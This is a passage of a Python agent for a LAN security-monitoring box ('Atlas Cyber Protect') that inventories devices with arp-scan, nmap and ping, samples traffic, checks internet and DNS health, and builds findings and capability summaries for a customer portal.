#!/usr/bin/env python3
"""Atlas Cyber Protect on-box agent — rich LAN discovery, heartbeat, lock, commands."""
from __future__ import annotations

import concurrent.futures
import hashlib
import json
import os
import re
import socket
import subprocess
import time
import urllib.error
import urllib.request
from pathlib import Path
from urllib.parse import quote

# Primary Atlas URL (funnel). atlas_reach tries this plus tailnet/LAN fallbacks
# so heartbeats, owner-login and portal updates work even when DNS for the
# funnel name is broken on the customer network.
ATLAS_URL = os.environ.get("ATLAS_URL", "https://atlas-server.taile9cc75.ts.net").rstrip("/")
TOKEN = os.environ.get("ENROLL_TOKEN", "").strip()


def atlas_base() -> str:
    try:
        from atlas_reach import atlas_base as _reach

        return _reach()
    except Exception:
        return ATLAS_URL


def portal_release_base() -> str:
    env = os.environ.get(
        "ACP_PORTAL_UPDATE_URL", f"{atlas_base()}/releases/public/cyber-protect/portal"
    )
    return env.rstrip("/")


# Portal UI (room) auto-update channel — master files live on Atlas releases.
PORTAL_RELEASE_BASE = portal_release_base()
PORTAL_FILES = (
    "portal.html",
    "guide.json",
    "portal_server.py",
    "agent.py",
    "atlas_reach.py",
    "customer-setup.py",
    "ui_guardian.py",
    "infra_secure.py",
    "gateway_secure.py",
    "link_guard.py",
    "remote_install.py",
    "companion_store.py",
    "atlas-themes.css",
    "atlas-themes.js",
    "install-desktop-tools.sh",
)
DATA = Path("/var/lib/atlas-cyber-protect")
STATE = DATA / "state.json"
AGENT_RELEASES = DATA / "agent-releases"
LOCK_FLAG = DATA / "subscription.locked"
DECISION_Q = DATA / "decision_queue.jsonl"
INTERVAL = int(os.environ.get("ACP_INTERVAL_SEC", "45"))
TRAFFIC_SAMPLE_SEC = int(os.environ.get("ACP_TRAFFIC_SAMPLE_SEC", "8"))
PING_COUNT = int(os.environ.get("ACP_PING_COUNT", "3"))

# Small OUI fallback when arp-scan/nmap omit vendor
_OUI_HINTS = {
    "00:1a:2b": "Ayecom / network",
    "b8:27:eb": "Raspberry Pi",
    "dc:a6:32": "Raspberry Pi",
    "e4:5f:01": "Raspberry Pi",
    "28:6c:07": "Xiaomi",
    "64:cc:2e": "Xiaomi",
    "f0:d5:bf": "Intel",
    "3c:22:fb": "Apple",
    "a4:83:e7": "Apple",
    "f0:18:98": "Apple",
    "00:50:56": "VMware",
    "00:15:5d": "Hyper-V",
    "52:54:00": "QEMU/KVM",
    "00:1c:42": "Parallels",
    "d8:3a:dd": "Google",
    "f4:f5:d8": "Google",
    "00:1e:06": "Wistron / OEM",
    "00:e0:4c": "Realtek",
    "00:0c:29": "VMware",
    "18:b4:30": "Nest",
    "54:60:09": "Google",
    "ac:84:c6": "TP-Link",
    "50:c7:bf": "TP-Link",
    "14:eb:b6": "TP-Link",
    "c8:3a:35": "Tenda",
    "00:24:e4": "Withings",
    "b0:4e:26": "TP-Link",
    "00:17:88": "Philips Hue",
    "ec:b5:fa": "Philips",
    "00:1d:c9": "Gainward / OEM",
    "00:90:a9": "Western Digital",
    "00:11:32": "Synology",
    "00:08:9b": "Cisco",
    "00:1b:67": "Cisco",
    "00:26:bb": "Apple",
}


def load_state() -> dict:
    base = {
        "seen_macs": {},
        "first_seen_at": time.time(),
        "learning_pct": 0.0,
        "gateway_ips": [],
        "active_gateway": "",
        "open_findings": [],
        "activity": [],
        "jobs": [],
        "last_devices": [],
        "subscription_locked": False,
        "traffic_totals": {},
        "timeout_counts": {},
        "last_port_scan_at": 0,
        "decisions": {},
    }
    if STATE.is_file():
        try:
            loaded = json.loads(STATE.read_text(encoding="utf-8"))
            if isinstance(loaded, dict):
                base.update(loaded)
        except Exception:
            pass
    base.setdefault("seen_macs", {})
    base.setdefault("decisions", {})
    base.setdefault("traffic_totals", {})
    base.setdefault("timeout_counts", {})
    base.setdefault("last_devices", [])
    base.setdefault("open_findings", [])
    base.setdefault("activity", [])
    return base


def save_state(st: dict) -> None:
    DATA.mkdir(parents=True, exist_ok=True)
    # Preserve portal-only keys the heartbeat loop may not carry
    try:
        if STATE.is_file():
            prev = json.loads(STATE.read_text(encoding="utf-8"))
            if isinstance(prev, dict):
                for key in ("link_guard_hits", "endpoint_lessons", "companion_agents", "install_invites"):
                    if key not in st and key in prev:
                        st[key] = prev[key]
    except Exception:
        pass
    STATE.write_text(json.dumps(st), encoding="utf-8")


def lan_ip() -> str:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("1.1.1.1", 80))
        ip = s.getsockname()[0]
        s.close()
        return ip
    except Exception:
        return ""


def tailscale_ip() -> str:
    try:
        out = subprocess.check_output(
            ["tailscale", "ip", "-4"], text=True, stderr=subprocess.DEVNULL, timeout=5
        )
        return (out.strip().splitlines() or [""])[0].strip()
    except Exception:
        return ""


def ping_ok(host: str = "8.8.8.8") -> bool:
    try:
        r = subprocess.run(
            ["ping", "-c", "1", "-W", "2", host],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            timeout=5,
        )
        return r.returncode == 0
    except Exception:
        return False


def ping_rtt_ms(host: str, count: int = 3) -> dict:
    """Measure RTT to an internet host for quality display."""
    out = {"host": host, "ok": False, "avg_ms": None, "loss_pct": 100.0}
    try:
        r = subprocess.run(
            ["ping", "-c", str(count), "-W", "2", host],
            capture_output=True,
            text=True,
            timeout=count + 6,
        )
        text = (r.stdout or "") + (r.stderr or "")
        lm = re.search(r"(\d+(?:\.\d+)?)% packet loss", text)
        if lm:
            out["loss_pct"] = float(lm.group(1))
        rm = re.search(
            r"(?:rtt|round-trip) min/avg/max(?:/[^=]+)* =\s*([\d.]+)/([\d.]+)/([\d.]+)",
            text,
        )
        if rm:
            out["avg_ms"] = round(float(rm.group(2)), 2)
            out["ok"] = out["loss_pct"] < 100
        elif r.returncode == 0:
            out["ok"] = True
            out["loss_pct"] = 0.0
    except Exception:
        pass
    return out


def dns_resolve_ok(name: str = "one.one.one.one") -> dict:
    try:
        infos = socket.getaddrinfo(name, 443, type=socket.SOCK_STREAM)
        addrs = sorted({i[4][0] for i in infos if i and i[4]})
        return {"ok": bool(addrs), "name": name, "addrs": addrs[:4]}
    except Exception as exc:
        return {"ok": False, "name": name, "error": str(exc)[:80]}


def is_unicast_host_mac(mac: str) -> bool:
    """Drop multicast / broadcast / link-local group MACs from inventory & timeline."""
    m = (mac or "").lower().replace("-", ":")
    if len(m) < 17:
        return False
    if m in ("00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"):
        return False
    if m.startswith("33:33:") or m.startswith("01:00:5e") or m.startswith("01:80:c2"):
        return False
    # I/G bit set = multicast
    try:
        if int(m[0:2], 16) & 0x01:
            return False
    except ValueError:
        return False
    return True


def default_gateway() -> dict:
    try:
        out = subprocess.check_output(
            ["ip", "-j", "route", "show", "default"],
            text=True,
            stderr=subprocess.DEVNULL,
            timeout=5,
        )
        rows = json.loads(out or "[]")
        if rows:
            return {
                "gateway": str(rows[0].get("gateway") or ""),
                "dev": str(rows[0].get("dev") or ""),
                "ok": True,
            }
    except Exception:
        pass
    return {"gateway": "", "dev": "", "ok": False}


def probe_network_health() -> dict:
    """Real internet + DNS + gateway checks shown in Insights / How it works."""
    gw = default_gateway()
    cloudflare = ping_rtt_ms("1.1.1.1")
    google = ping_rtt_ms("8.8.8.8")
    dns = dns_resolve_ok()
    ok = bool(cloudflare.get("ok") or google.get("ok"))
    return {
        "internet_ok": ok,
        "gateway": gw,
        "dns": dns,
        "targets": [cloudflare, google],
        "checked_at": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
    }


def track_device_churn(st: dict, devices: list[dict]) -> list[dict]:
    """Record new / returned / quiet devices for the Timeline UI."""
    prev = {
        str(d.get("mac") or ""): d
        for d in (st.get("last_devices") or [])
        if d.get("mac") and is_unicast_host_mac(str(d.get("mac"))) and d.get("ip")
    }
    now_macs = {
        str(d.get("mac") or ""): d
        for d in devices
        if d.get("mac") and is_unicast_host_mac(str(d.get("mac"))) and d.get("ip")
    }
    events = list(st.get("device_events") or [])
    ts = time.time()
    for mac, d in now_macs.items():
        if mac not in prev:
            events.insert(
                0,
                {
                    "ts": ts,
                    "kind": "new",
                    "mac": mac,
                    "ip": d.get("ip"),
                    "label": d.get("hostname") or d.get("vendor") or d.get("ip") or mac,
                    "plain": f"New on LAN: {d.get('hostname') or d.get('vendor') or d.get('ip') or mac}",
                },
            )
        elif prev[mac].get("reachable") and not d.get("reachable"):
            events.insert(
                0,
                {
                    "ts": ts,
                    "kind": "quiet",
                    "mac": mac,
                    "ip": d.get("ip"),
                    "label": d.get("hostname") or d.get("ip") or mac,
                    "plain": f"Went quiet (ping timeout): {d.get('hostname') or d.get('ip') or mac}",
                },
            )
        elif (not prev[mac].get("reachable")) and d.get("reachable"):
            events.insert(
                0,
                {
                    "ts": ts,
                    "kind": "back",
                    "mac": mac,
                    "ip": d.get("ip"),
                    "label": d.get("hostname") or d.get("ip") or mac,
                    "plain": f"Back online: {d.get('hostname') or d.get('ip') or mac}",
                },
            )
    for mac, d in prev.items():
        if mac not in now_macs:
            events.insert(
                0,
                {
                    "ts": ts,
                    "kind": "gone",
                    "mac": mac,
                    "ip": d.get("ip"),
                    "label": d.get("hostname") or d.get("ip") or mac,
                    "plain": f"No longer seen on sweep: {d.get('hostname') or d.get('ip') or mac}",
                },
            )
    st["device_events"] = events[:80]
    return st["device_events"]


def services_summary(devices: list[dict]) -> list[dict]:
    """Aggregate open ports / service hints across the LAN."""
    counts: dict[str, int] = {}
    for d in devices:
        for p in str(d.get("open_ports") or "").split(","):
            p = p.strip()
            if p.isdigit():
                counts[p] = counts.get(p, 0) + 1
    names = {
        "22": "SSH",
        "23": "Telnet",
        "53": "DNS",
        "80": "HTTP",
        "139": "NetBIOS",
        "443": "HTTPS",
        "445": "SMB",
        "554": "RTSP camera",
        "3389": "RDP",
        "8080": "HTTP-alt",
        "8443": "HTTPS-alt",
        "9100": "Printer",
    }
    rows = [
        {"port": p, "count": n, "name": names.get(p, f"TCP {p}")}
        for p, n in sorted(counts.items(), key=lambda x: (-x[1], int(x[0])))
    ]
    return rows[:20]


def build_capabilities(st: dict) -> list[dict]:
    """Honest capability list with live Active flags from the last real scan."""
    devices = st.get("last_devices") or []
    sm = st.get("scan_meta") or {}
    nh = st.get("network_health") or {}
    has_ping = any(isinstance(d.get("ping_ms"), (int, float)) for d in devices)
    has_ports = any(d.get("open_ports") for d in devices)
    has_traf = any(int(d.get("bytes_obs") or 0) > 0 for d in devices)
    has_vendor = any(d.get("vendor") for d in devices)
    ts = st.get("threat_summary") or {}
    has_threat_scan = bool(ts.get("checked_at") or st.get("last_threat_scan_at") or has_ports)
    return [
        {
            "id": "lan_sweep",
            "title": "Full LAN device sweep",
            "does": "Finds devices with arp-scan + nmap ping + ARP table on your subnet.",
            "active": bool(sm.get("cidr") and devices),
            "proof": f"{len(devices)} devices on {sm.get('cidr') or '—'}",
        },
        {
            "id": "threat_hunt",
            "title": "LAN threat hunting",
            "does": (
                "Scans for risky services (Telnet, SMB, RDP, open DBs…), new unknown devices, "
                "gateway MAC changes (ARP spoof hint), and inbound probes toward Protect. "
                "Not a full antivirus agent on every phone/PC file — Protect is a LAN side-box."
            ),
            "active": has_threat_scan,
            "proof": (
                f"{ts.get('findings', 0)} open · {ts.get('critical', 0)} critical · "
                f"{ts.get('devices_with_ports', 0)} hosts with ports · checks: "
                + ", ".join(ts.get("checks") or ["warming"])
            ),
        },
        {
            "id": "latency",
            "title": "Per-device ping & timeouts",
            "does": "Measures ms latency and packet loss to every answering host.",
            "active": has_ping,
            "proof": f"{sum(1 for d in devices if d.get('reachable'))} answering now",
        },
        {
            "id": "identity",
            "title": "Device identification",
            "does": "Vendor (OUI), hostname (DNS), open ports, and type guess.",
            "active": has_vendor or has_ports,
            "proof": f"{sum(1 for d in devices if d.get('vendor'))} with vendor · {sum(1 for d in devices if d.get('open_ports'))} with ports",
        },
        {
            "id": "bandwidth",
            "title": "Bandwidth pulse (observed)",
            "does": "Samples traffic visible to this side-box and ranks top talkers.",
            "active": has_traf,
            "proof": "Live sample on Protect interface" if has_traf else "Waiting for sample",
        },
        {
            "id": "internet",
            "title": "Internet & DNS watch",
            "does": "Pings 1.1.1.1 / 8.8.8.8 and checks DNS resolve from this box.",
            "active": bool(nh.get("checked_at")),
            "proof": (
                f"Internet {'OK' if nh.get('internet_ok') else 'DOWN'} · DNS "
                f"{'OK' if (nh.get('dns') or {}).get('ok') else 'fail'}"
            ),
        },
        {
            "id": "learning",
            "title": "Behaviour learning",
            "does": "Builds a normal pattern for this site over time (learning %).",
            "active": float(st.get("learning_pct") or 0) > 0,
            "proof": f"{float(st.get('learning_pct') or 0):.0f}% learned",
        },
        {
            "id": "decisions",
            "title": "You decide Fine / Neutralize",
            "does": "Never silent-blocks. You approve containment when something looks wrong.",
            "active": True,
            "proof": f"{len(st.get('decisions') or {})} decisions remembered",
        },
        {
            "id": "guardian",
            "title": "On-box guardian agent",
            "does": "Explains the UI and network in plain language (policy unchanged without you).",
            "active": bool(st.get("guardian_pulse")),
            "proof": f"Pulse {(st.get('guardian_pulse') or {}).get('score', '—')}/100",
        },
        {
            "id": "remote",
            "title": "Private / Funnel HTTPS UI",
            "does": "Customer UI on LAN or Tailscale HTTPS — not your internet gateway.",
            "active": True,
            "proof": "Portal on :8787 · silent side-box",
        },
        {
            "id": "not_gateway",
            "title": "Never becomes your router",
            "does": "Does not take DHCP or become the LAN default gateway for phones/PCs.",
            "active": True,
            "proof": f"Box gateway {((nh.get('gateway') or {}).get('gateway') or '—')} (Protect egress only)",
        },
    ]


def _which(cmd: str) -> str | None:
    from shutil import which

    return which(cmd)


def _iface_and_cidr() -> tuple[str, str, str]:
    """Return (iface, self_ip, cidr) for the default LAN path."""
    self_ip = lan_ip()
    iface = ""
    cidr = ""
    try:
        out = subprocess.check_output(
            ["ip", "-j", "route", "get", "1.1.1.1"],
            text=True,
            stderr=subprocess.DEVNULL,
            timeout=5,
        )
        rows = json.loads(out or "[]")
        if rows:
            iface = str(rows[0].get("dev") or "")
            self_ip = str(rows[0].get("prefsrc") or self_ip)
    except Exception:
        pass
    if self_ip and iface:
        try:
            out = subprocess.check_output(
                ["ip", "-j", "addr", "show", "dev", iface],
                text=True,
                stderr=subprocess.DEVNULL,
                timeout=5,
            )
            for link in json.loads(out or "[]"):
                for a in link.get("addr_info") or []:
                    if a.get("family") == "inet" and a.get("local") == self_ip:
                        pfx = int(a.get("prefixlen") or 24)
                        cidr = f"{_network_addr(self_ip, pfx)}/{pfx}"
                        break
        except Exception:
            pass
    if not cidr and self_ip:
        cidr = f"{_network_addr(self_ip, 24)}/24"
    return iface or "eth0", self_ip, cidr


def _network_addr(ip: str, prefix: int) -> str:
    parts = [int(x) for x in ip.split(".")]
    mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
    n = (parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]
    n &= mask
    return f"{(n >> 24) & 255}.{(n >> 16) & 255}.{(n >> 8) & 255}.{n & 255}"


def _norm_mac(mac: str) -> str:
    mac = (mac or "").lower().strip().replace("-", ":")
    if re.fullmatch(r"[0-9a-f]{12}", mac):
        mac = ":".join(mac[i : i + 2] for i in range(0, 12, 2))
    return mac


def _vendor_from_mac(mac: str, hint: str = "") -> str:
    if hint and hint.lower() not in {"(unknown)", "unknown", ""}:
        return hint.strip()[:80]
    key = _norm_mac(mac)[:8]
    return _OUI_HINTS.get(key, "")


def _merge_dev(by_mac: dict[str, dict], ip: str, mac: str, **extra) -> None:
    mac = _norm_mac(mac)
    ip = (ip or "").strip()
    if not mac or mac in {"00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"}:
        return
    if ip.startswith("169.254.") or ip.startswith("127."):
        return
    cur = by_mac.get(mac) or {
        "ip": "",
        "mac": mac,
        "hostname": "",
        "vendor": "",
        "ping_ms": None,
        "ping_min_ms": None,
        "ping_max_ms": None,
        "loss_pct": None,
        "reachable": False,
        "timeouts": 0,
        "last_timeout_at": "",
        "bytes_obs": 0,
        "bytes_rate": 0,
        "traffic_share_pct": 0.0,
        "open_ports": "",
        "device_type": "unknown",
        "role_guess": "",
    }
    if ip and (not cur.get("ip") or cur["ip"].startswith("169.")):
        cur["ip"] = ip
    for k, v in extra.items():
        if v is None or v == "":
            continue
        if k == "vendor" and cur.get("vendor"):
            continue
        if k == "hostname" and cur.get("hostname"):
            continue
        cur[k] = v
    if not cur.get("vendor"):
        cur["vendor"] = _vendor_from_mac(mac, str(extra.get("vendor") or ""))
    by_mac[mac] = cur


def _scan_ip_neigh(by_mac: dict[str, dict]) -> None:
    try:
        out = subprocess.check_output(
            ["ip", "neigh"], text=True, stderr=subprocess.DEVNULL, timeout=10
        )
        for line in out.splitlines():
            parts = line.split()
            if len(parts) < 5 or "lladdr" not in parts:
                continue
            if any(x in parts for x in ("FAILED", "INCOMPLETE")):
                continue
            ip = parts[0]
            mac = parts[parts.index("lladdr") + 1]
            _merge_dev(by_mac, ip, mac)
    except Exception:
        pass


def _scan_arp_scan(by_mac: dict[str, dict], iface: str) -> None:
    if not _which("arp-scan"):
        return
    cmds = [
        ["arp-scan", f"--interface={iface}", "--localnet", "--retry=2", "--timeout=500"],
        ["arp-scan", "--localnet", "--retry=2", "--timeout=500"],
    ]
    for cmd in cmds:
        try:
            out = subprocess.check_output(cmd, text=True, stderr=subprocess.DEVNULL, timeout=90)
            for line in out.splitlines():
                # 192.168.1.10  aa:bb:cc:dd:ee:ff  Vendor Name
                m = re.match(
                    r"^(\d+\.\d+\.\d+\.\d+)\s+([0-9a-fA-F:]{11,17})\s+(.*)$", line.strip()
                )
                if not m:
                    continue
                _merge_dev(by_mac, m.group(1), m.group(2), vendor=m.group(3).strip())
            return
        except Exception:
            continue


def _scan_nmap_ping(by_mac: dict[str, dict], cidr: str) -> None:
    if not _which("nmap") or not cidr:
        return
    try:
        out = subprocess.check_output(
            [
                "nmap",
                "-sn",
                "-T4",
                "--max-retries",
                "1",
                "--host-timeout",
                "8s",
                cidr,
            ],
            text=True,
            stderr=subprocess.DEVNULL,
            timeout=120,
        )
    except Exception:
        return
    cur_ip = ""
    cur_host = ""
    for line in out.splitlines():
        m = re.match(r"Nmap scan report for (.+)$", line.strip())
        if m:
            body = m.group(1).strip()
            hm = re.match(r"^(.+?) \((\d+\.\d+\.\d+\.\d+)\)$", body)
            if hm:
                cur_host, cur_ip = hm.group(1), hm.group(2)
            elif re.match(r"^\d+\.\d+\.\d+\.\d+$", body):
                cur_ip, cur_host = body, ""
            else:
                cur_host, cur_ip = body, ""
            continue
        mm = re.search(
            r"MAC Address:\s*([0-9A-Fa-f:]{11,17})(?:\s*\((.+)\))?", line
        )
        if mm and cur_ip:
            _merge_dev(
                by_mac,
                cur_ip,
                mm.group(1),
                hostname=cur_host if cur_host and not re.match(r"^\d+\.", cur_host) else "",
                vendor=(mm.group(2) or "").strip(),
            )


def _ping_one(ip: str) -> dict:
    """Return ping stats for one host."""
    empty = {
        "ping_ms": None,
        "ping_min_ms": None,
        "ping_max_ms": None,
        "loss_pct": 100.0,
        "reachable": False,
        "timeouts": PING_COUNT,
    }
    if not ip:
        return empty
    try:
        r = subprocess.run(
            ["ping", "-c", str(PING_COUNT), "-W", "1", ip],
            capture_output=True,
            text=True,
            timeout=PING_COUNT + 4,
        )
        out = (r.stdout or "") + (r.stderr or "")
        loss = 100.0
        lm = re.search(r"(\d+(?:\.\d+)?)% packet loss", out)
        if lm:
            loss = float(lm.group(1))
        rtt = re.search(
            r"rtt min/avg/max/(?:mdev|stddev) = "
            r"([\d.]+)/([\d.]+)/([\d.]+)",
            out,
        )
        if not rtt:
            # BusyBox / alternate format
            rtt = re.search(
                r"round-trip min/avg/max(?:/[^=]+)*=\s*([\d.]+)/([\d.]+)/([\d.]+)",
                out,
            )
        if rtt:
            return {
                "ping_min_ms": round(float(rtt.group(1)), 2),
                "ping_ms": round(float(rtt.group(2)), 2),
                "ping_max_ms": round(float(rtt.group(3)), 2),
                "loss_pct": loss,
                "reachable": loss < 100,
                "timeouts": int(round(PING_COUNT * (loss / 100.0))),
            }
        return {
            **empty,
            "loss_pct": loss,
            "reachable": r.returncode == 0 and loss < 100,
            "timeouts": PING_COUNT if loss >= 100 else int(round(PING_COUNT * (loss / 100.0))),
        }
    except Exception:
        return empty


def _enrich_pings(by_mac: dict[str, dict], st: dict) -> None:
    ips = [(mac, d.get("ip") or "") for mac, d in by_mac.items() if d.get("ip")]
    if not ips:
        return
    timeout_counts = dict(st.get("timeout_counts") or {})
    with concurrent.futures.ThreadPoolExecutor(max_workers=min(32, max(4, len(ips)))) as pool:
        futs = {pool.submit(_ping_one, ip): mac for mac, ip in ips}
        for fut in concurrent.futures.as_completed(futs):
            mac = futs[fut]
            try:
                stats = fut.result()
            except Exception:
                stats = {
                    "ping_ms": None,
                    "loss_pct": 100.0,
                    "reachable": False,
                    "timeouts": PING_COUNT,
                }
            d = by_mac[mac]
            d.update(stats)
            if not stats.get("reachable"):
                timeout_counts[mac] = int(timeout_counts.get(mac) or 0) + 1
                d["last_timeout_at"] = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
            else:
                timeout_counts[mac] = 0
            d["timeout_streak"] = int(timeout_counts.get(mac) or 0)
    st["timeout_counts"] = timeout_counts


def _reverse_dns(by_mac: dict[str, dict]) -> None:
    for d in by_mac.values():
        if d.get("hostname") or not d.get("ip"):
            continue
        try:
            host, _, _ = socket.gethostbyaddr(d["ip"])
            if host and not host.startswith(d["ip"]):
                d["hostname"] = host.split(".")[0][:64]
        except Exception:
            pass


def _sample_traffic(by_mac: dict[str, dict], iface: str, st: dict) -> None:
    """Promiscuous short capture — ranks talkers visible to this side-box."""
    if not _which("tcpdump"):
        return
    try:
        r = subprocess.run(
            [
                "tcpdump",
                "-i",
                iface,
                "-e",
                "-nn",
                "-l",
                "-q",
                "-c",
                "4000",
            ],
            capture_output=True,
            text=True,
            timeout=TRAFFIC_SAMPLE_SEC + 4,
        )
        out = r.stdout or ""
    except subprocess.TimeoutExpired as exc:
        out = (exc.stdout or b"").decode("utf-8", errors="replace") if isinstance(exc.stdout, (bytes, bytearray)) else (exc.stdout or "")
    except Exception:
        return
    counts: dict[str, int] = {}
    # ethernet frames: ... aa:bb:cc:dd:ee:ff > ... length N
    for line in out.splitlines():
        macs = re.findall(r"((?:[0-9a-f]{2}:){5}[0-9a-f]{2})", line.lower())
        lm = re.search(r"length (\d+)", line)
        length = int(lm.group(1)) if lm else 64
        for mac in macs[:2]:
            if mac.startswith("ff:ff:ff") or mac.startswith("01:00:5e"):
                continue
            counts[mac] = counts.get(mac, 0) + length
    totals = dict(st.get("traffic_totals") or {})
    sample_total = sum(counts.values()) or 1
    for mac, d in by_mac.items():
        obs = int(counts.get(mac) or 0)
        d["bytes_obs"] = obs
        d["bytes_rate"] = int(obs / max(1, TRAFFIC_SAMPLE_SEC))
        d["traffic_share_pct"] = round(100.0 * obs / sample_total, 1) if obs else 0.0
        totals[mac] = int(totals.get(mac) or 0) + obs
        d["bytes_total"] = totals[mac]
    # Also register MACs only seen in traffic (no ARP yet)
    for mac, obs in counts.items():
        if mac not in by_mac and obs > 0:
            _merge_dev(by_mac, "", mac, bytes_obs=obs, bytes_rate=int(obs / max(1, TRAFFIC_SAMPLE_SEC)))
            by_mac[mac]["traffic_share_pct"] = round(100.0 * obs / sample_total, 1)
            totals[mac] = int(totals.get(mac) or 0) + obs
            by_mac[mac]["bytes_total"] = totals[mac]
    st["traffic_totals"] = totals


def _guess_type(d: dict) -> None:
    try:
        from device_catalog import classify_device

        classify_device(d)
    except Exception:
        vendor = (d.get("vendor") or "").lower()
        d.setdefault("device_type", "unknown")
        d.setdefault("icon_key", "unknown")
        d.setdefault("display_name", d.get("hostname") or d.get("vendor") or d.get("ip") or d.get("mac") or "Device")
        if "apple" in vendor:
            d["device_type"] = "phone/tablet"
            d["icon_key"] = "phone"


def _port_scan(by_mac: dict[str, dict], st: dict) -> None:
    """Security-focused port scan + keep last ports between intervals."""
    try:
        from threat_hunter import security_port_scan

        security_port_scan(by_mac, st)
    except Exception as exc:
        print(f"port_scan: {exc}", flush=True)

def discover_devices(st: dict) -> list[dict]:
    """Full LAN inventory: ARP sweep + nmap + ping latency + identity + traffic sample."""
    iface, self_ip, cidr = _iface_and_cidr()
    by_mac: dict[str, dict] = {}
    _scan_arp_scan(by_mac, iface)
    _scan_nmap_ping(by_mac, cidr)
    _scan_ip_neigh(by_mac)
    # Always include self
    if self_ip:
        self_mac = ""
        try:
            out = subprocess.check_output(
                ["ip", "-j", "link", "show", "dev", iface],
                text=True,
                stderr=subprocess.DEVNULL,
                timeout=5,
            )
            links = json.loads(out or "[]")
            if links:
                self_mac = _norm_mac(str(links[0].get("address") or ""))
        except Exception:
            pass
        if self_mac:
            _merge_dev(
                by_mac,
                self_ip,
                self_mac,
                hostname=socket.gethostname().split(".")[0],
                vendor="Atlas Cyber Protect",
                device_type="protect",
                role_guess="This Protect box",
            )
    _reverse_dns(by_mac)
    _enrich_pings(by_mac, st)
    _sample_traffic(by_mac, iface, st)
    _port_scan(by_mac, st)
    for d in by_mac.values():
        _guess_type(d)
        # Compact stats blob for Atlas SQLite
        d["stats"] = {
            "ping_ms": d.get("ping_ms"),
            "ping_min_ms": d.get("ping_min_ms"),
            "ping_max_ms": d.get("ping_max_ms"),
            "loss_pct": d.get("loss_pct"),
            "reachable": d.get("reachable"),
            "timeouts": d.get("timeouts"),
            "timeout_streak": d.get("timeout_streak"),
            "last_timeout_at": d.get("last_timeout_at"),
            "bytes_obs": d.get("bytes_obs"),
            "bytes_rate": d.get("bytes_rate"),
            "bytes_total": d.get("bytes_total"),
            "traffic_share_pct": d.get("traffic_share_pct"),
            "open_ports": d.get("open_ports"),
            "device_type": d.get("device_type"),
            "role_guess": d.get("role_guess"),
        }
    devices = sorted(
        [
            d
            for d in by_mac.values()
            if is_unicast_host_mac(str(d.get("mac") or "")) and d.get("ip")
        ],
        key=lambda x: (-int(x.get("bytes_obs") or 0), x.get("ip") or ""),
    )
    st["scan_meta"] = {
        "iface": iface,
        "cidr": cidr,
        "self_ip": self_ip,
        "device_count": len(devices),
        "reachable": sum(1 for d in devices if d.get("reachable")),
        "scanned_at": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
    }
    return devices


def learning_pct(st: dict) -> float:
    elapsed = max(0.0, time.time() - float(st.get("first_seen_at") or time.time()))
    time_pct = min(90.0, (elapsed / (2 * 3600.0)) * 90.0)
    n = len(st.get("seen_macs") or {})
    return round(min(100.0, time_pct + min(10.0, n * 0.5)), 1)


def apply_gateway_failover(st: dict, approved: list[str]) -> None:
    st["gateway_ips"] = approved or st.get("gateway_ips") or []
    if ping_ok("8.8.8.8") or ping_ok("1.1.1.1"):
        return
    for gw in st["gateway_ips"]:
        try:
            subprocess.run(
                ["ip", "route", "replace", "default", "via", gw],
                check=False,
                timeout=5,
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            st["active_gateway"] = gw
            time.sleep(2)
            if ping_ok("8.8.8.8"):
                return
        except Exception:
            continue


def apply_blocked_macs(macs: list[str]) -> None:
    """Isolate listed MACs on the Protect box filter only — never customer gateway."""
    try:
        from threat_hunter import apply_blocked_macs as _block

        _block(macs, _norm_mac, is_unicast_host_mac)
    except Exception as exc:
        print(f"neutralize: {exc}", flush=True)


def set_locked(locked: bool, message: str = "") -> None:
    DATA.mkdir(parents=True, exist_ok=True)
    if locked:
        LOCK_FLAG.write_text(message or "Subscription paused", encoding="utf-8")
    elif LOCK_FLAG.is_file():
        LOCK_FLAG.unlink()


def findings_from_scan(
    devices: list[dict],
    internet_ok: bool,
    decided: dict | None = None,
    st: dict | None = None,
) -> list[dict]:
    """Security threats first; light health tips after."""
    decided = decided or {}
    st = st if st is not None else {}
    tips: list[dict] = []
    try:
        from threat_hunter import build_threat_findings

        tips.extend(
            build_threat_findings(
                devices,
                st,
                internet_ok,
                default_gateway_fn=default_gateway,
                norm_mac=_norm_mac,
            )
        )
    except Exception as exc:
        print(f"threat_hunter: {exc}", flush=True)

    if len(devices) == 0:
        tips.append(
            {
                "key": "no_devices",
                "category": "coverage",
                "severity": "medium",
                "title": "No LAN devices visible",
                "plain_tip": "Cyber Protect cannot see other devices yet — plug into the main switch.",
                "tech_detail": "empty arp/nmap scan",
                "customer_state": "checked",
            }
        )
    slow = [
        d
        for d in devices
        if d.get("reachable") and isinstance(d.get("ping_ms"), (int, float)) and float(d["ping_ms"]) >= 80
    ]
    if slow:
        sample = ", ".join(
            f"{(x.get('hostname') or x.get('ip'))} {x.get('ping_ms')}ms" for x in slow[:3]
        )
        tips.append(
            {
                "key": "high_latency",
                "category": "performance",
                "severity": "low",
                "title": "Slow devices",
                "plain_tip": f"Some devices answer slowly ({sample}). Wi‑Fi interference or a busy link can cause this.",
                "tech_detail": f"slow_count={len(slow)}",
                "customer_state": "checked",
            }
        )
    talkers = sorted(
        [d for d in devices if int(d.get("bytes_obs") or 0) > 0],
        key=lambda x: int(x.get("bytes_obs") or 0),
        reverse=True,
    )
    if talkers and float(talkers[0].get("traffic_share_pct") or 0) >= 55:
        top = talkers[0]
        if (top.get("vendor") or "") != "Atlas Cyber Protect":
            tips.append(
                {
                    "key": f"bandwidth:{top.get('mac')}",
                    "category": "bandwidth",
                    "severity": "low",
                    "title": "Heavy bandwidth talker",
                    "plain_tip": (
                        f"{top.get('hostname') or top.get('ip') or top.get('mac')} is using a large share "
                        f"of observed traffic (~{top.get('traffic_share_pct')}% in the last sample)."
                    ),
                    "tech_detail": f"bytes_obs={top.get('bytes_obs')} rate={top.get('bytes_rate')}/s",
                    "customer_state": "checked",
                    "mac": top.get("mac"),
                }
            )
